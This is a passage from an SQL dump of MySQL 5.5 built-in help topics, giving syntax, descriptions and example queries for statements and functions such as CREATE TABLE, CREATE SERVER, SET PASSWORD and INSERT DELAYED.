see\nhttp://dev.mysql.com/doc/refman/5.5/en/alter-table-problems.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-table.html'),(467,'MPOINTFROMWKB',33,'MPointFromWKB(wkb[,srid]), MultiPointFromWKB(wkb[,srid])\n\nConstructs a MultiPoint value using its WKB representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(468,'CHAR BYTE',23,'The CHAR BYTE data type is an alias for the BINARY data type. This is a\ncompatibility feature.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(469,'REPAIR TABLE',21,'Syntax:\nREPAIR [NO_WRITE_TO_BINLOG | LOCAL] TABLE\n tbl_name [, tbl_name] ...\n [QUICK] [EXTENDED] [USE_FRM]\n\nREPAIR TABLE repairs a possibly corrupted table. By default, it has the\nsame effect as myisamchk --recover tbl_name. REPAIR TABLE works for\nMyISAM, ARCHIVE, and CSV tables. See\nhttp://dev.mysql.com/doc/refman/5.5/en/myisam-storage-engine.html,\nhttp://dev.mysql.com/doc/refman/5.5/en/archive-storage-engine.html, and\nhttp://dev.mysql.com/doc/refman/5.5/en/csv-storage-engine.html. This\nstatement does not work with views.\n\nThis statement requires SELECT and INSERT privileges for the table.\n\nREPAIR TABLE is supported for partitioned tables. However, the USE_FRM\noption cannot be used with this statement on a partitioned table.\n\nYou can use ALTER TABLE ... REPAIR PARTITION to repair one or more\npartitions; for more information, see [HELP ALTER TABLE], and\nhttp://dev.mysql.com/doc/refman/5.5/en/partitioning-maintenance.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/repair-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/repair-table.html'),(470,'MERGE',18,'The MERGE storage engine, also known as the MRG_MyISAM engine, is a\ncollection of identical MyISAM tables that can be used as one.\n\"Identical\" means that all tables have identical column and index\ninformation. You cannot merge MyISAM tables in which the columns are\nlisted in a different order, do not have exactly the same columns, or\nhave the indexes in different order. However, any or all of the MyISAM\ntables can be compressed with myisampack. See\nhttp://dev.mysql.com/doc/refman/5.5/en/myisampack.html. Differences in\ntable options such as AVG_ROW_LENGTH, MAX_ROWS, or PACK_KEYS do not\nmatter.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/merge-storage-engine.html\n\n','mysql> CREATE TABLE t1 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20)) ENGINE=MyISAM;\nmysql> CREATE TABLE t2 (\n -> a INT NOT NULL AUTO_INCREMENT PRIMARY KEY,\n -> message CHAR(20)) ENGINE=MyISAM;\nmysql> INSERT INTO t1 (message) VALUES (\'Testing\'),(\'table\'),(\'t1\');\nmysql> INSERT INTO t2 (message) VALUES (\'Testing\'),(\'table\'),(\'t2\');\nmysql> CREATE TABLE total (\n -> a INT NOT NULL AUTO_INCREMENT,\n -> message CHAR(20), INDEX(a))\n -> ENGINE=MERGE UNION=(t1,t2) INSERT_METHOD=LAST;\n','http://dev.mysql.com/doc/refman/5.5/en/merge-storage-engine.html'),(471,'CREATE TABLE',40,'Syntax:\nCREATE [TEMPORARY] TABLE [IF NOT EXISTS] tbl_name\n (create_definition,...)\n [table_options]\n [partition_options]\n\nCREATE [TEMPORARY] TABLE [IF NOT EXISTS] tbl_name\n [(create_definition,...)]\n [table_options]\n [partition_options]\n select_statement\n\nCREATE [TEMPORARY] TABLE [IF NOT EXISTS] tbl_name\n { LIKE old_tbl_name | (LIKE old_tbl_name) }\n\ncreate_definition:\n col_name column_definition\n | [CONSTRAINT [symbol]] PRIMARY KEY [index_type] (index_col_name,...)\n [index_option] ...\n | {INDEX|KEY} [index_name] [index_type] (index_col_name,...)\n [index_option] ...\n | [CONSTRAINT [symbol]] UNIQUE [INDEX|KEY]\n [index_name] [index_type] (index_col_name,...)\n [index_option] ...\n | {FULLTEXT|SPATIAL} [INDEX|KEY] [index_name] (index_col_name,...)\n [index_option] ...\n | [CONSTRAINT [symbol]] FOREIGN KEY\n [index_name] (index_col_name,...) reference_definition\n | CHECK (expr)\n\ncolumn_definition:\n data_type [NOT NULL | NULL] [DEFAULT default_value]\n [AUTO_INCREMENT] [UNIQUE [KEY] | [PRIMARY] KEY]\n [COMMENT \'string\']\n [COLUMN_FORMAT {FIXED|DYNAMIC|DEFAULT}]\n [STORAGE {DISK|MEMORY|DEFAULT}]\n [reference_definition]\n\ndata_type:\n BIT[(length)]\n | TINYINT[(length)] [UNSIGNED] [ZEROFILL]\n | SMALLINT[(length)] [UNSIGNED] [ZEROFILL]\n | MEDIUMINT[(length)] [UNSIGNED] [ZEROFILL]\n | INT[(length)] [UNSIGNED] [ZEROFILL]\n | INTEGER[(length)] [UNSIGNED] [ZEROFILL]\n | BIGINT[(length)] [UNSIGNED] [ZEROFILL]\n | REAL[(length,decimals)] [UNSIGNED] [ZEROFILL]\n | DOUBLE[(length,decimals)] [UNSIGNED] [ZEROFILL]\n | FLOAT[(length,decimals)] [UNSIGNED] [ZEROFILL]\n | DECIMAL[(length[,decimals])] [UNSIGNED] [ZEROFILL]\n | NUMERIC[(length[,decimals])] [UNSIGNED] [ZEROFILL]\n | DATE\n | TIME\n | TIMESTAMP\n | DATETIME\n | YEAR\n | CHAR[(length)] [BINARY]\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | VARCHAR(length) [BINARY]\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | BINARY[(length)]\n | VARBINARY(length)\n | TINYBLOB\n | BLOB\n | MEDIUMBLOB\n | LONGBLOB\n | TINYTEXT [BINARY]\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | TEXT [BINARY]\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | MEDIUMTEXT [BINARY]\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | LONGTEXT [BINARY]\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | ENUM(value1,value2,value3,...)\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | SET(value1,value2,value3,...)\n [CHARACTER SET charset_name] [COLLATE collation_name]\n | spatial_type\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]\n\nindex_type:\n USING {BTREE | HASH}\n\nindex_option:\n KEY_BLOCK_SIZE [=] value\n | index_type\n | WITH PARSER parser_name\n | COMMENT \'string\'\n\nreference_definition:\n REFERENCES tbl_name (index_col_name,...)\n [MATCH FULL | MATCH PARTIAL | MATCH SIMPLE]\n [ON DELETE reference_option]\n [ON UPDATE reference_option]\n\nreference_option:\n RESTRICT | CASCADE | SET NULL | NO ACTION\n\ntable_options:\n table_option [[,] table_option] ...\n\ntable_option:\n ENGINE [=] engine_name\n | AUTO_INCREMENT [=] value\n | AVG_ROW_LENGTH [=] value\n | [DEFAULT] CHARACTER SET [=] charset_name\n | CHECKSUM [=] {0 | 1}\n | [DEFAULT] COLLATE [=] collation_name\n | COMMENT [=] \'string\'\n | CONNECTION [=] \'connect_string\'\n | DATA DIRECTORY [=] \'absolute path to directory\'\n | DELAY_KEY_WRITE [=] {0 | 1}\n | INDEX DIRECTORY [=] \'absolute path to directory\'\n | INSERT_METHOD [=] { NO | FIRST | LAST }\n | KEY_BLOCK_SIZE [=] value\n | MAX_ROWS [=] value\n | MIN_ROWS [=] value\n | PACK_KEYS [=] {0 | 1 | DEFAULT}\n | PASSWORD [=] \'string\'\n | ROW_FORMAT [=] {DEFAULT|DYNAMIC|FIXED|COMPRESSED|REDUNDANT|COMPACT}\n | TABLESPACE tablespace_name [STORAGE {DISK|MEMORY|DEFAULT}]\n | UNION [=] (tbl_name[,tbl_name]...)\n\npartition_options:\n PARTITION BY\n { [LINEAR] HASH(expr)\n | [LINEAR] KEY [ALGORITHM={1|2}] (column_list)\n | RANGE{(expr) | COLUMNS(column_list)}\n | LIST{(expr) | COLUMNS(column_list)} }\n [PARTITIONS num]\n [SUBPARTITION BY\n { [LINEAR] HASH(expr)\n | [LINEAR] KEY [ALGORITHM={1|2}] (column_list) }\n [SUBPARTITIONS num]\n ]\n [(partition_definition [, partition_definition] ...)]\n\npartition_definition:\n PARTITION partition_name\n [VALUES \n {LESS THAN {(expr | value_list) | MAXVALUE} \n | \n IN (value_list)}]\n [[STORAGE] ENGINE [=] engine_name]\n [COMMENT [=] \'comment_text\' ]\n [DATA DIRECTORY [=] \'data_dir\']\n [INDEX DIRECTORY [=] \'index_dir\']\n [MAX_ROWS [=] max_number_of_rows]\n [MIN_ROWS [=] min_number_of_rows]\n [TABLESPACE [=] tablespace_name]\n [NODEGROUP [=] node_group_id]\n [(subpartition_definition [, subpartition_definition] ...)]\n\nsubpartition_definition:\n SUBPARTITION logical_name\n [[STORAGE] ENGINE [=] engine_name]\n [COMMENT [=] \'comment_text\' ]\n [DATA DIRECTORY [=] \'data_dir\']\n [INDEX DIRECTORY [=] \'index_dir\']\n [MAX_ROWS [=] max_number_of_rows]\n [MIN_ROWS [=] min_number_of_rows]\n [TABLESPACE [=] tablespace_name]\n [NODEGROUP [=] node_group_id]\n\nselect_statement:\n [IGNORE | REPLACE] [AS] SELECT ... (Some valid select statement)\n\nCREATE TABLE creates a table with the given name. You must have the\nCREATE privilege for the table.\n\nRules for permissible table names are given in\nhttp://dev.mysql.com/doc/refman/5.5/en/identifiers.html. By default,\nthe table is created in the default database, using the InnoDB storage\nengine. An error occurs if the table exists, if there is no default\ndatabase, or if the database does not exist.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/create-table.html'),(472,'>',20,'Syntax:\n>\n\nGreater than:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html\n\n','mysql> SELECT 2 > 2;\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(473,'ANALYZE TABLE',21,'Syntax:\nANALYZE [NO_WRITE_TO_BINLOG | LOCAL] TABLE\n tbl_name [, tbl_name] ...\n\nANALYZE TABLE analyzes and stores the key distribution for a table.\nDuring the analysis, the table is locked with a read lock for InnoDB\nand MyISAM. This statement works with InnoDB, NDB, and MyISAM tables.\nFor MyISAM tables, this statement is equivalent to using myisamchk\n--analyze. This statement does not work with views.\n\nFor more information on how the analysis works within InnoDB, see\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-statistics-estimation.htm\nl. Also see\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-analyze-table-complexity.\nhtml and\nhttp://dev.mysql.com/doc/refman/5.5/en/innodb-restrictions.html.\n\nMySQL uses the stored key distribution to decide the order in which\ntables should be joined when you perform a join on something other than\na constant. In addition, key distributions can be used when deciding\nwhich indexes to use for a specific table within a query.\n\nThis statement requires SELECT and INSERT privileges for the table.\n\nANALYZE TABLE is supported for partitioned tables, and you can use\nALTER TABLE ... ANALYZE PARTITION to analyze one or more partitions;\nfor more information, see [HELP ALTER TABLE], and\nhttp://dev.mysql.com/doc/refman/5.5/en/partitioning-maintenance.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/analyze-table.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/analyze-table.html'),(474,'MICROSECOND',32,'Syntax:\nMICROSECOND(expr)\n\nReturns the microseconds from the time or datetime expression expr as a\nnumber in the range from 0 to 999999.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT MICROSECOND(\'12:00:00.123456\');\n -> 123456\nmysql> SELECT MICROSECOND(\'2009-12-31 23:59:59.000010\');\n -> 10\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(475,'CONSTRAINT',40,'MySQL supports foreign keys, which let you cross-reference related data\nacross tables, and foreign key constraints, which help keep this\nspread-out data consistent. The essential syntax for a foreign key\nconstraint definition in a CREATE TABLE or ALTER TABLE statement looks\nlike this:\n\n[CONSTRAINT [symbol]] FOREIGN KEY\n [index_name] (index_col_name, ...)\n REFERENCES tbl_name (index_col_name,...)\n [ON DELETE reference_option]\n [ON UPDATE reference_option]\n\nreference_option:\n RESTRICT | CASCADE | SET NULL | NO ACTION\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-table-foreign-keys.html\n\n','CREATE TABLE product (\n category INT NOT NULL, id INT NOT NULL,\n price DECIMAL,\n PRIMARY KEY(category, id)\n) ENGINE=INNODB;\n\nCREATE TABLE customer (\n id INT NOT NULL,\n PRIMARY KEY (id)\n) ENGINE=INNODB;\n\nCREATE TABLE product_order (\n no INT NOT NULL AUTO_INCREMENT,\n product_category INT NOT NULL,\n product_id INT NOT NULL,\n customer_id INT NOT NULL,\n\n PRIMARY KEY(no),\n INDEX (product_category, product_id),\n INDEX (customer_id),\n\n FOREIGN KEY (product_category, product_id)\n REFERENCES product(category, id)\n ON UPDATE CASCADE ON DELETE RESTRICT,\n\n FOREIGN KEY (customer_id)\n REFERENCES customer(id)\n) ENGINE=INNODB;\n','http://dev.mysql.com/doc/refman/5.5/en/create-table-foreign-keys.html'),(476,'CREATE SERVER',40,'Syntax:\nCREATE SERVER server_name\n FOREIGN DATA WRAPPER wrapper_name\n OPTIONS (option [, option] ...)\n\noption:\n { HOST character-literal\n | DATABASE character-literal\n | USER character-literal\n | PASSWORD character-literal\n | SOCKET character-literal\n | OWNER character-literal\n | PORT numeric-literal }\n\nThis statement creates the definition of a server for use with the\nFEDERATED storage engine. The CREATE SERVER statement creates a new row\nin the servers table in the mysql database. This statement requires the\nSUPER privilege.\n\nThe server_name should be a unique reference to the server. Server\ndefinitions are global within the scope of the server, it is not\npossible to qualify the server definition to a specific database.\nserver_name has a maximum length of 64 characters (names longer than 64\ncharacters are silently truncated), and is case insensitive. You may\nspecify the name as a quoted string.\n\nThe wrapper_name should be mysql, and may be quoted with single\nquotation marks. Other values for wrapper_name are not currently\nsupported.\n\nFor each option you must specify either a character literal or numeric\nliteral. Character literals are UTF-8, support a maximum length of 64\ncharacters and default to a blank (empty) string. String literals are\nsilently truncated to 64 characters. Numeric literals must be a number\nbetween 0 and 9999, default value is 0.\n\n*Note*: The OWNER option is currently not applied, and has no effect on\nthe ownership or operation of the server connection that is created.\n\nThe CREATE SERVER statement creates an entry in the mysql.servers table\nthat can later be used with the CREATE TABLE statement when creating a\nFEDERATED table. The options that you specify will be used to populate\nthe columns in the mysql.servers table. The table columns are\nServer_name, Host, Db, Username, Password, Port and Socket.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/create-server.html\n\n','CREATE SERVER s\nFOREIGN DATA WRAPPER mysql\nOPTIONS (USER \'Remote\', HOST \'192.168.1.106\', DATABASE \'test\');\n','http://dev.mysql.com/doc/refman/5.5/en/create-server.html'),(477,'FIELD',38,'Syntax:\nFIELD(str,str1,str2,str3,...)\n\nReturns the index (position) of str in the str1, str2, str3, ... list.\nReturns 0 if str is not found.\n\nIf all arguments to FIELD() are strings, all arguments are compared as\nstrings. If all arguments are numbers, they are compared as numbers.\nOtherwise, the arguments are compared as double.\n\nIf str is NULL, the return value is 0 because NULL fails equality\ncomparison with any value. FIELD() is the complement of ELT().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT FIELD(\'ej\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 2\nmysql> SELECT FIELD(\'fo\', \'Hej\', \'ej\', \'Heja\', \'hej\', \'foo\');\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(478,'MAKETIME',32,'Syntax:\nMAKETIME(hour,minute,second)\n\nReturns a time value calculated from the hour, minute, and second\narguments.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT MAKETIME(12,15,30);\n -> \'12:15:30\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(479,'CURDATE',32,'Syntax:\nCURDATE()\n\nReturns the current date as a value in \'YYYY-MM-DD\' or YYYYMMDD format,\ndepending on whether the function is used in a string or numeric\ncontext.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT CURDATE();\n -> \'2008-06-13\'\nmysql> SELECT CURDATE() + 0;\n -> 20080613\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(480,'SET PASSWORD',10,'Syntax:\nSET PASSWORD [FOR user] = password_option\n\npassword_option: {\n PASSWORD(\'auth_string\')\n | OLD_PASSWORD(\'auth_string\')\n | \'hash_string\'\n}\n\nThe SET PASSWORD statement assigns a password to a MySQL user account:\n\no With no FOR user clause, this statement sets the password for the\n current user:\n\nSET PASSWORD = password_option;\n\n Any client who connects to the server using a nonanonymous account\n can change the password for that account. To see which account the\n server authenticated you as, invoke the CURRENT_USER() function:\n\nSELECT CURRENT_USER();\n\n Permitted old_passwords values are described later in this section.\n\no With a FOR user clause, this statement sets the password for the\n named account, which must exist:\n\nSET PASSWORD FOR \'jeffrey\'@\'localhost\' = password_option;\n\n In this case, you must have the UPDATE privilege for the mysql\n database.\n\nWhen the read_only system variable is enabled, SET PASSWORD requires\nthe SUPER privilege in addition to any other required privileges.\n\nIf a FOR user clause is given, the account name uses the format\ndescribed in http://dev.mysql.com/doc/refman/5.5/en/account-names.html.\nThe user value should be given as \'user_name\'@\'host_name\', where\n\'user_name\' and \'host_name\' are exactly as listed in the User and Host\ncolumns of the account\'s mysql.user table row. If you specify only a\nuser name, a host name of \'%\' is used. For example, to set the password\nfor an account with User and Host column values of \'bob\' and\n\'%.example.org\', write the statement like this:\n\nSET PASSWORD FOR \'bob\'@\'%.example.org\' = PASSWORD(\'cleartext password\');\n\nThe password can be specified in these ways:\n\no Using the PASSWORD() function\n\n The \'auth_string\' function argument is the cleartext (unencrypted)\n password. PASSWORD() hashes the password and returns the encrypted\n password string for storage in the mysql.user account row.\n\n The old_passwords system variable value determines the hashing method\n used by PASSWORD(). It should be set to a value compatible with the\n hash format required by the account authentication plugin. For\n example, if the account uses the mysql_native_password authentication\n plugin, old_passwords should be 0 for PASSWORD() to produce a hash\n value in the correct format. For mysql_old_password, old_passwords\n should be 1.\n\no Using the OLD_PASSWORD() function:\n\n The \'auth_string\' function argument is the cleartext (unencrypted)\n password. OLD_PASSWORD() hashes the password using pre-4.1 hashing\n and returns the encrypted password string for storage in the\n mysql.user account row. This hashing method is appropriate only for\n accounts that use the mysql_old_password authentication plugin.\n\no Using an already encrypted password string\n\n The password is specified as a string literal. It must represent the\n already encrypted password value, in the hash format required by the\n authentication method used for the account.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/set-password.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/set-password.html'),(481,'ALTER TABLESPACE',40,'Syntax:\nALTER TABLESPACE tablespace_name\n {ADD|DROP} DATAFILE \'file_name\'\n [INITIAL_SIZE [=] size]\n [WAIT]\n ENGINE [=] engine_name\n\nThis statement can be used either to add a new data file, or to drop a\ndata file from a tablespace.\n\nThe ADD DATAFILE variant enables you to specify an initial size using\nan INITIAL_SIZE clause, where size is measured in bytes; the default\nvalue is 134217728 (128 MB). Prior to MySQL Cluster NDB 7.2.14, this\nvalue was required to be specified using digits (Bug #13116514, Bug\n#16104705, Bug #62858); in MySQL Cluster NDB 7.2.14 and later, you may\noptionally follow size with a one-letter abbreviation for an order of\nmagnitude, similar to those used in my.cnf. Generally, this is one of\nthe letters M (megabytes) or G (gigabytes).\n\n*Note*: All MySQL Cluster Disk Data objects share the same namespace.\nThis means that each Disk Data object must be uniquely named (and not\nmerely each Disk Data object of a given type). For example, you cannot\nhave a tablespace and an data file with the same name, or an undo log\nfile and a tablespace with the same name.\n\nOn 32-bit systems, the maximum supported value for INITIAL_SIZE is\n4294967296 (4 GB). (Bug #29186)\n\nINITIAL_SIZE is rounded, explicitly, as for CREATE TABLESPACE.\n\nOnce a data file has been created, its size cannot be changed; however,\nyou can add more data files to the tablespace using additional ALTER\nTABLESPACE ... ADD DATAFILE statements.\n\nUsing DROP DATAFILE with ALTER TABLESPACE drops the data file\n\'file_name\' from the tablespace. You cannot drop a data file from a\ntablespace which is in use by any table; in other words, the data file\nmust be empty (no extents used). See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-cluster-disk-data-objects.\nhtml. In addition, any data file to be dropped must previously have\nbeen added to the tablespace with CREATE TABLESPACE or ALTER\nTABLESPACE.\n\nBoth ALTER TABLESPACE ... ADD DATAFILE and ALTER TABLESPACE ... DROP\nDATAFILE require an ENGINE clause which specifies the storage engine\nused by the tablespace. Currently, the only accepted values for\nengine_name are NDB and NDBCLUSTER.\n\nWAIT is parsed but otherwise ignored, and so has no effect in MySQL\n5.5. It is intended for future expansion.\n\nWhen ALTER TABLESPACE ... ADD DATAFILE is used with ENGINE = NDB, a\ndata file is created on each Cluster data node. You can verify that the\ndata files were created and obtain information about them by querying\nthe INFORMATION_SCHEMA.FILES table. For example, the following query\nshows all data files belonging to the tablespace named newts:\n\nmysql> SELECT LOGFILE_GROUP_NAME, FILE_NAME, EXTRA\n -> FROM INFORMATION_SCHEMA.FILES\n -> WHERE TABLESPACE_NAME = \'newts\' AND FILE_TYPE = \'DATAFILE\';\n+--------------------+--------------+----------------+\n| LOGFILE_GROUP_NAME | FILE_NAME | EXTRA |\n+--------------------+--------------+----------------+\n| lg_3 | newdata.dat | CLUSTER_NODE=3 |\n| lg_3 | newdata.dat | CLUSTER_NODE=4 |\n| lg_3 | newdata2.dat | CLUSTER_NODE=3 |\n| lg_3 | newdata2.dat | CLUSTER_NODE=4 |\n+--------------------+--------------+----------------+\n2 rows in set (0.03 sec)\n\nSee http://dev.mysql.com/doc/refman/5.5/en/files-table.html.\n\nALTER TABLESPACE is useful only with Disk Data storage for MySQL\nCluster. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-cluster-disk-data.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-tablespace.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-tablespace.html'),(482,'DATABASE',17,'Syntax:\nDATABASE()\n\nReturns the default (current) database name as a string in the utf8\ncharacter set. If there is no default database, DATABASE() returns\nNULL. Within a stored routine, the default database is the database\nthat the routine is associated with, which is not necessarily the same\nas the database that is the default in the calling context.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','mysql> SELECT DATABASE();\n -> \'test\'\n','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(483,'IF FUNCTION',6,'Syntax:\nIF(expr1,expr2,expr3)\n\nIf expr1 is TRUE (expr1 <> 0 and expr1 <> NULL) then IF() returns\nexpr2; otherwise it returns expr3. IF() returns a numeric or string\nvalue, depending on the context in which it is used.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html\n\n','mysql> SELECT IF(1>2,2,3);\n -> 3\nmysql> SELECT IF(1<2,\'yes\',\'no\');\n -> \'yes\'\nmysql> SELECT IF(STRCMP(\'test\',\'test1\'),\'no\',\'yes\');\n -> \'no\'\n','http://dev.mysql.com/doc/refman/5.5/en/control-flow-functions.html'),(484,'ENUM',23,'ENUM(\'value1\',\'value2\',...) [CHARACTER SET charset_name] [COLLATE\ncollation_name]\n\nAn enumeration. A string object that can have only one value, chosen\nfrom the list of values \'value1\', \'value2\', ..., NULL or the special \'\'\nerror value. ENUM values are represented internally as integers.\n\nAn ENUM column can have a maximum of 65,535 distinct elements. (The\npractical limit is less than 3000.) A table can have no more than 255\nunique element list definitions among its ENUM and SET columns\nconsidered as a group. For more information on these limits, see\nhttp://dev.mysql.com/doc/refman/5.5/en/limits-frm-file.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/string-type-overview.html'),(485,'POINTFROMWKB',33,'PointFromWKB(wkb[,srid])\n\nConstructs a Point value using its WKB representation and SRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkb-functions.html'),(486,'POWER',3,'Syntax:\nPOWER(X,Y)\n\nThis is a synonym for POW().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(487,'ATAN',3,'Syntax:\nATAN(X)\n\nReturns the arc tangent of X, that is, the value whose tangent is X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT ATAN(2);\n -> 1.1071487177941\nmysql> SELECT ATAN(-2);\n -> -1.1071487177941\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(488,'STRCMP',38,'Syntax:\nSTRCMP(expr1,expr2)\n\nSTRCMP() returns 0 if the strings are the same, -1 if the first\nargument is smaller than the second according to the current sort\norder, and 1 otherwise.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-comparison-functions.html\n\n','mysql> SELECT STRCMP(\'text\', \'text2\');\n -> -1\nmysql> SELECT STRCMP(\'text2\', \'text\');\n -> 1\nmysql> SELECT STRCMP(\'text\', \'text\');\n -> 0\n','http://dev.mysql.com/doc/refman/5.5/en/string-comparison-functions.html'),(489,'INSERT DELAYED',28,'Syntax:\nINSERT DELAYED ...\n\nThe DELAYED option for the INSERT statement is a MySQL extension to\nstandard SQL that is very useful if you have clients that cannot or\nneed not wait for the INSERT to complete. This is a common situation\nwhen you use MySQL for logging and you also periodically run SELECT and\nUPDATE statements that take a long time to complete.\n\nWhen a client uses INSERT DELAYED, it gets an okay from the server at\nonce, and the row is queued to be inserted when the table is not in use\nby any other thread.\n\nAnother major benefit of using INSERT DELAYED is that inserts from many\nclients are bundled together and written in one block. This is much\nfaster than performing many separate inserts.\n\nNote that INSERT DELAYED is slower than a normal INSERT if the table is\nnot otherwise in use. There is also the additional overhead for the\nserver to handle a separate thread for each table for which there are\ndelayed rows. This means that you should use INSERT DELAYED only when\nyou are really sure that you need it.\n\nThe queued rows are held only in memory until they are inserted into\nthe table. This means that if you terminate mysqld forcibly (for\nexample, with kill -9) or if mysqld dies unexpectedly, any queued rows\nthat have not been written to disk are lost.\n\nThere are some constraints on the use of DELAYED:\n\no INSERT DELAYED works only with MyISAM, MEMORY, ARCHIVE, and BLACKHOLE\n tables. For engines that do not support DELAYED, an error occurs.\n\no An error occurs for INSERT DELAYED if used with a table that has been\n locked with LOCK TABLES because the insert must be handled by a\n separate thread, not by the session that holds the lock.\n\no For MyISAM tables, if there are no free blocks in the middle of the\n data file, concurrent SELECT and INSERT statements are supported.\n Under these circumstances, you very seldom need to use INSERT DELAYED\n with MyISAM.\n\no INSERT DELAYED should be used only for INSERT statements that specify\n value lists. The server ignores DELAYED for INSERT ... SELECT or\n INSERT ... ON DUPLICATE KEY UPDATE statements.\n\no Because the INSERT DELAYED statement returns immediately, before the\n rows are inserted, you cannot use LAST_INSERT_ID() to get the\n AUTO_INCREMENT value that the statement might generate.\n\no DELAYED rows are not visible to SELECT statements until they actually\n have been inserted.\n\no Prior to MySQL 5.5.7, INSERT DELAYED was treated as a normal INSERT\n if the statement inserted multiple rows, binary logging was enabled,\n and the global logging format was statement-based (that is, whenever\n binlog_format was set to STATEMENT). Beginning with MySQL 5.5.7,\n INSERT DELAYED is always handled as a simple INSERT (that is, without\n the DELAYED option) whenever the value of binlog_format is STATEMENT\n or MIXED. (In the latter case, the statement no longer triggers a\n switch to row-based logging, and so is logged using the\n statement-based format.)\n\n This does not apply when using row-based binary logging mode\n (binlog_format set to ROW), in which INSERT DELAYED statements are\n always executed using the DELAYED option as specified, and logged as\n row-update events.\n\no DELAYED is ignored on slave replication servers, so that INSERT\n DELAYED is treated as a normal INSERT on slaves. This is because\n DELAYED could cause the slave to have different data than the master.\n\no Pending INSERT DELAYED statements are lost if a table is write locked\n and ALTER TABLE is used to modify the table structure.\n\no INSERT DELAYED is not supported for views.\n\no INSERT DELAYED is not supported for partitioned tables.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/insert-delayed.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/insert-delayed.html'),(490,'SHOW PROFILE',27,'Syntax:\nSHOW PROFILE [type [, type] ... ]\n [FOR QUERY n]\n [LIMIT row_count [OFFSET offset]]\n\ntype:\n ALL\n | BLOCK IO\n | CONTEXT SWITCHES\n | CPU\n | IPC\n | MEMORY\n | PAGE FAULTS\n | SOURCE\n | SWAPS\n\nThe SHOW PROFILE and SHOW PROFILES statements display profiling\ninformation that indicates resource usage for statements executed\nduring the course of the current session.\n\nProfiling is controlled by the profiling session variable, which has a\ndefault value of 0 (OFF). Profiling is enabled by setting profiling to\n1 or ON:\n\nmysql> SET profiling = 1;\n\nSHOW PROFILES displays a list of the most recent statements sent to the\nserver. The size of the list is controlled by the\nprofiling_history_size session variable, which has a default value of\n15. The maximum value is 100. Setting the value to 0 has the practical\neffect of disabling profiling.\n\nAll statements are profiled except SHOW PROFILE and SHOW PROFILES, so\nyou will find neither of those statements in the profile list.\nMalformed statements are profiled. For example, SHOW PROFILING is an\nillegal statement, and a syntax error occurs if you try to execute it,\nbut it will show up in the profiling list.\n\nSHOW PROFILE displays detailed information about a single statement.\nWithout the FOR QUERY n clause, the output pertains to the most\nrecently executed statement. If FOR QUERY n is included, SHOW PROFILE\ndisplays information for statement n. The values of n correspond to the\nQuery_ID values displayed by SHOW PROFILES.\n\nThe LIMIT row_count clause may be given to limit the output to\nrow_count rows. If LIMIT is given, OFFSET offset may be added to begin\nthe output offset rows into the full set of rows.\n\nBy default, SHOW PROFILE displays Status and Duration columns. The\nStatus values are like the State values displayed by SHOW 